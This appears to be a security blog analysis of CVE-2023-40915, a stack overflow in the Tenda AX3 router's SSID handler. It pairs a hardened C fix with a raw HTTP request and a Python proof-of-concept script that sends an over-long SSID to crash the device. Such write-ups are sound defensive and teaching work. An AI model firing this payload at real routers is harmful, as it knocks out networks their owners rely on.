In recent years, cybercriminals have increasingly targeted routers, since they are the entry point for most network-connected devices. With the disclosure of a stack buffer overflow vulnerability in the Tenda AX3 router, firmware version 16.03.12.11, we decided to investigate further and provide an in-depth analysis. In this blog post, we explore the details of CVE-2023-40915, including code snippets, links to the original references, and how the flaw can be abused for a Denial of Service (DoS) attack.

Exploit Details

The vulnerability was found in the function form_fast_setting_wifi_set, which processes the router's SSID parameter. A remote attacker with valid credentials can exploit it to cause a Denial of Service (DoS) by sending a specially crafted request with an overly long SSID.

The affected function can be found in the binary file "httpd" responsible for handling HTTP requests.

Here's a code snippet of the affected function:

void form_fast_setting_wifi_set(...)   /* handler for /goform/form_fast_setting_wifi_set */
{
  ...
  char ssid[32];                       /* fixed 32-byte stack buffer */
  ...
  strcpy(ssid, get_cgi("ssid"));       /* unbounded copy of the request-supplied SSID */
  ...
}

As you can see, the function declares a buffer named 'ssid' with a size of 32 bytes. The value returned by get_cgi for the 'ssid' parameter is not checked for length before being copied into that buffer with strcpy(). Any input longer than the buffer overflows it, corrupting adjacent stack memory, which can lead to a DoS.
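The following is an added example, not Tenda's firmware code, showing how the same handler could be written so an over-long SSID is rejected before anything is written past the buffer. It keeps the 32-byte buffer size from the snippet above; the struct and function names (wifi_cfg, set_ssid_checked, form_get_bounded, wifi_set_from_body) and the sample request bodies are assumptions constructed for this illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example (not Tenda firmware code): a bounded replacement for the
 * unchecked strcpy() in form_fast_setting_wifi_set. The 32-byte buffer size
 * comes from the snippet in the post; struct and function names are
 * assumptions made for this illustration. */

#define SSID_BUF_LEN 32   /* same size as the vulnerable stack buffer */

struct wifi_cfg {
    char ssid[SSID_BUF_LEN];
};

/* Copy src into dst only if it fits together with its NUL terminator.
 * Returns 0 on success, -1 on rejection; dst is cleared on rejection so a
 * caller never works with stale or partial data. Never reads more than
 * dstlen bytes of src, so an unterminated input cannot cause a read overrun. */
int set_ssid_checked(char *dst, size_t dstlen, const char *src)
{
    if (dst == NULL || dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)            /* a missing form field must not deref NULL */
        return -1;
    size_t n = 0;
    while (n < dstlen && src[n] != '\0')
        n++;
    if (n == dstlen)            /* no room for the terminator: reject */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Find `key=` in an application/x-www-form-urlencoded body and copy its raw
 * value, bounded by outlen. Returns the value length, or -1 if the key is
 * absent or the value is too long. Percent-decoding is left out: decoding
 * can only shorten a value, so checking the raw length is conservative. */
int form_get_bounded(const char *body, const char *key, char *out, size_t outlen)
{
    size_t klen = strlen(key);
    const char *p = body;

    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    while (p != NULL && *p != '\0') {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            const char *v = p + klen + 1;
            const char *end = strchr(v, '&');
            size_t vlen = end ? (size_t)(end - v) : strlen(v);
            if (vlen >= outlen)
                return -1;      /* would overflow: refuse, do not truncate */
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return (int)vlen;
        }
        p = strchr(p, '&');
        if (p != NULL)
            p++;                /* skip the separator to the next pair */
    }
    return -1;
}

/* Hardened handler sketch: the request is refused before anything is written
 * past the fixed buffer. Returns 0 if cfg->ssid was updated, -1 if refused. */
int wifi_set_from_body(struct wifi_cfg *cfg, const char *body)
{
    char ssid[SSID_BUF_LEN];
    if (form_get_bounded(body, "ssid", ssid, sizeof ssid) < 0)
        return -1;
    return set_ssid_checked(cfg->ssid, sizeof cfg->ssid, ssid);
}

/* Returns the stored SSID length after processing body, or -1 if refused. */
int accepted_ssid_len(const char *body)
{
    struct wifi_cfg cfg;
    if (wifi_set_from_body(&cfg, body) != 0)
        return -1;
    return (int)strlen(cfg.ssid);
}

/* Constructed request bodies: a normal one and the 40-byte case from the post. */
static const char kNormalBody[]   = "ssid=HomeNet&channel=6";
static const char kOverlongBody[] = "ssid=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

int main(void)
{
    printf("normal body  -> %d\n", accepted_ssid_len(kNormalBody));   /* 7 */
    printf("40-byte body -> %d\n", accepted_ssid_len(kOverlongBody)); /* -1 */
    return 0;
}
```

The design choice worth noting is that the check refuses rather than truncates: silently cutting an SSID to 31 characters would hide the fact that the request was malformed, whereas returning an error lets the handler respond with an HTTP error and log the event, which is also the signal a defender would want to alert on.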

The Vulnerability Report provides more details (see [Original References](#original-references)).

An example HTTP request that triggers this vulnerability looks like the one shown below:

POST /goform/form_fast_setting_wifi_set HTTP/1.1
Host: 192.168..1
Content-Length: length
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive

ssid=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

In this example, the ssid parameter value contains 40 bytes of data, which exceeds the 32-byte buffer. Sending this request overwrites stack memory beyond the buffer, which is what causes the DoS.

To develop an exploit, an attacker can use Python to send an HTTP POST request with a specially crafted SSID value:

import requests

target_url = "http://192.168..1/goform/form_fast_setting_wifi_set"
ssid_value = "A" * 40  # Change the number to adjust payload size
data = {'ssid': ssid_value}
username = "admin"
password = "password"  # Replace with the router's password

# The endpoint requires valid credentials, passed here as HTTP Basic auth
response = requests.post(target_url, data=data, auth=(username, password))

if response.status_code == 200:
    print("Exploit sent successfully!")
else:
    print("Failed to send exploit")

Just replace the target URL, password, and the desired payload size accordingly to fit your needs.

Original References

The vulnerability was initially reported by Clementloualo, who has published a blog post detailing the findings: https://www.clementloualo.com/tenda-ax3-stack-buffer-overflow/

Moreover, the CVE entry for this vulnerability can be found on the CVE List website: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40915

Conclusion

The stack buffer overflow in Tenda AX3 v16.03.12.11 (CVE-2023-40915) can be exploited by attackers to cause a Denial of Service (DoS) via the router's SSID parameter. Users are advised to upgrade their router's firmware to the latest version and change their device's SSID and password to prevent unauthorized access. Network administrators should ensure that their devices are updated and secure, and employ network monitoring to identify any unusual activity.

Timeline

Published on: 08/25/2023 15:15:09 UTC
Last modified on: 08/29/2023 16:11:13 UTC